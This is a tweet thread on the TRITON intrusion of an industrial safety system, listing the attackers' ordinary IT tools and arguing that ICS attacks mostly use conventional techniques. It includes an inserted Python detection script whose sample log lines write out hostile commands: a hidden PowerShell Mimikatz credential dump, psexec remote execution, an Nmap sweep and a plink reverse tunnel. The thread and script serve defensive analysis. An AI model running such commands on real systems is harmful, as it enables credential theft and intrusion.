Today at #S4x19, @electricfork and I debated different sides of "if OT tools and talent are needed to detect attacks on ICS." Some thoughts on ICS attacks and #TRITON in a tweet thread.
For the debate, I'm not convinced either way because there are few *public* intrusion data sets for either side of the argument. I think peeps are over it now, maybe no point to sharing this, but to get the convo started let's dump/share some rando #TRITON #TRISIS TTPs.
.@FireEye blogged/presented about #TRITON and some of the incident response activities in depth by @voteblake and friends in late 2017, fireeye.com/blog/threat-re… and
#TRITON was "unprecedented", it was "sophisticated", and it was "the first of its kind." It was also leaked to the internet (not by us), so nobody saw any other pieces, or talked about *how* the intrusion took place from an attacker TTP perspective.
In the #TRITON intrusion from the IT -> DMZ -> DCS -> SIS there were about 100 compromised systems, 99 of which were conventional Windows workstations and servers.
The #TRITON attackers used (or were observed using) DNS, HTTP, HTTPS, SSH, DCE/RPC, SMB, RDP protocols for various forms of interaction and C2. There were many connections directly to the internet.
The #TRITON attackers used Nmap, Iperf3, and other free utilities to perform internal reconnaissance and identified hosts and services on the "OT" network.
The #TRITON attackers used many sysinternals utilities including, but not limited to, PsExec, ADExplorer, ShareEnum, AccessEnum, ProcExp and so forth.
The #TRITON attackers lived off the land with things like PowerShell, ping, net, vssadmin. Standard stuff.
The #TRITON attackers used multiple SSH daemons with hardcoded crypto keys. They used things like PLINK for tunneled RDP, webshells, and METERPRETER. #basic
The #TRITON attackers used all the cats. Netcat, cryptcat, and @gentilkiwi's Mimikatz, the latter of which was used both in PE and PowerShell script form. #meow
When the jig was finally up, and remediation close, the #TRITON attackers did a quick smash and grab by stealing a fresh set of creds, SIS controller memory and project files from the SIS engineering workstation.
In June 2018, @reesespcres and I talked about "how" the malware developer(s) reverse engineered the #TriStation network protocol, fireeye.com/blog/threat-re…
In Oct 2018, @FireEye discussed elements of attribution and "who was behind" the #TRITON framework, fireeye.com/blog/threat-re…
If the #TRITON intrusion is a general exemplar for how ICS attacks occur, I see more similarities than I see differences from conventional intrusions in any other sector.
The notion of "ICS" is an artificial defender construct. Attackers see computers and networks. They don't care about the Purdue model. They follow a predictable attack lifecycle over the course of an intrusion.
The majority of so-called attacks on ICS are underpinned by basic computer intrusions enabled by conventional TTPs, tools and malware to serve as a conduit for impacting an industrial process. I think that we are best served by detecting adversary methods via @MITREattack TTPs.
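As an added, defender-side illustration of the point above (this is not code from the thread or its author): a small Python script that runs the conventional tooling named earlier in the thread (Nmap, PsExec, hidden/encoded PowerShell, Mimikatz, plink port forwarding, vssadmin) over constructed process-creation log lines and tags each hit with the ATT&CK technique id it is commonly mapped to. The log format, host names, user names, sample command lines and the tool-to-technique mapping are all my assumptions, not observations from the intrusion.

```python
"""Tag process-creation log lines with ATT&CK technique ids when they show
the conventional tooling named in the thread. Added example, not the thread
author's code; log format, sample lines, host names and the tool->technique
mapping are constructed/assumed for illustration."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str            # short detection name (ours)
    technique: str       # ATT&CK technique id the hit is mapped to (mapping is ours)
    pattern: re.Pattern  # searched against the full command line


# Ordered list: one line can match several rules (e.g. hidden PowerShell *and* Mimikatz).
RULES = [
    Rule("nmap-scan", "T1046",
         re.compile(r"(?:^|[\\/\s])nmap(?:\.exe)?\b", re.I)),
    Rule("psexec-remote-exec", "T1021.002",
         re.compile(r"psexec(?:64)?(?:\.exe)?\s+\\\\", re.I)),
    Rule("powershell-hidden-or-encoded", "T1059.001",
         re.compile(r"powershell(?:\.exe)?\b.*?(?:\s-e(?:nc|ncodedcommand)?\s|\s-w(?:indowstyle)?\s+hidden\b)", re.I)),
    Rule("mimikatz-credential-dump", "T1003.001",
         re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)),
    Rule("plink-port-forward", "T1572",
         re.compile(r"plink(?:\.exe)?\b.*\s-[RL]\s*\d+:", re.I)),
    Rule("vssadmin-create-shadow", "T1003.003",
         re.compile(r"vssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)),
    Rule("vssadmin-delete-shadows", "T1490",
         re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
]

# Constructed sample log, one event per line: "host|user|command line" (not real telemetry).
SAMPLE_LOG = [
    r"ws-eng-01|svc_backup|C:\Tools\nmap.exe -sS -p 1-65535 10.10.20.0/24",
    r"ws-eng-01|svc_backup|psexec.exe \\dcs-hmi-03 -s cmd.exe /c whoami",
    r"srv-file-02|admin|powershell.exe -nop -w hidden -c Invoke-Mimikatz -Command sekurlsa::logonpasswords",
    r"srv-jump-01|admin|C:\Users\admin\plink.exe -N -R 3389:10.10.30.15:3389 user@203.0.113.10",
    r"dc-01|admin|vssadmin create shadow /for=C:",
    r"ws-eng-01|operator|notepad.exe C:\project\notes.txt",  # benign
    r"srv-file-02|svc_backup|vssadmin list shadows",           # benign: list, not create/delete
]


def parse(line):
    """Split one constructed log line into (host, user, command line)."""
    host, user, cmd = line.split("|", 2)
    return host, user, cmd


def detect(log_lines):
    """Return one finding per (line, rule) match, in log order then rule order."""
    findings = []
    for line in log_lines:
        host, user, cmd = parse(line)
        for rule in RULES:
            if rule.pattern.search(cmd):
                findings.append({"host": host, "user": user, "rule": rule.name,
                                 "technique": rule.technique, "command": cmd})
    return findings


def techniques_by_host(findings):
    """Group technique ids per host in first-seen order. A single host showing
    discovery, lateral movement and credential theft is the conventional
    intrusion chain the thread describes, regardless of which Purdue level
    the host sits in."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], []).append(f["technique"])
    return by_host


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for f in hits:
        print(f"{f['host']:<12} {f['technique']:<10} {f['rule']:<30} {f['command']}")
    print(techniques_by_host(hits))
```

The rules key on command-line strings, so a renamed binary or an in-memory tool slips past them; the point is the lens, not the regexes: every hit here comes from ordinary Windows process telemetry and lands on a generic ATT&CK technique, with nothing ICS-specific needed to see the chain.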
When ESET exposed #INDUSTROYER they extensively documented the unique attributes of the ICS tailored malware. Behind the scenes, the attack involved mostly conventional intrusion TTPs. #xp_cmdshell
There aren't that many ICS attacks/intrusion cases in the public discourse, and those that are discussed publicly often leave out the actual intrusion evidence and data. I want hard evidence, yo.
N anecdotes on ICS attacks do not meet our desired confidence interval or burden of proof, and even if N was sufficient, the opacity of shared data from these intrusion stories leaves us without sufficient data to make a decision on how to best detect these things.
People in cybersecurity prefer to share what is new, novel, different rather than what is the same, even though what is the same offers a better basis for detection opportunities.
All of that said, what the hell do I know. I'm a newb in the ICS space. I came to #S4x19 to learn, not simply to pontificate and agree with myself. I'm looking for someone to convince me differently.
Are there any bona fide intrusions on ICS that show technical/forensic evidence contrary to my thesis? Show me the # of compromised systems. Show me the # of non-Windows/Linux malware. Show me the forensic data. Convince me. Let's talk.
Nobody needs more #TRITON rumination from me. There are lots of great takes on the intrusion, malware, ICS attacks, etc. from other folks and it's all just a google away.
If you're from the IT side and new to ICS threat stuff, I think you'll find @DragosInc blogs, @RobertMLee's robertmlee.org/tag/reading-li… and videos from S4 events youtube.com/channel/UC5MdL… extremely instructive.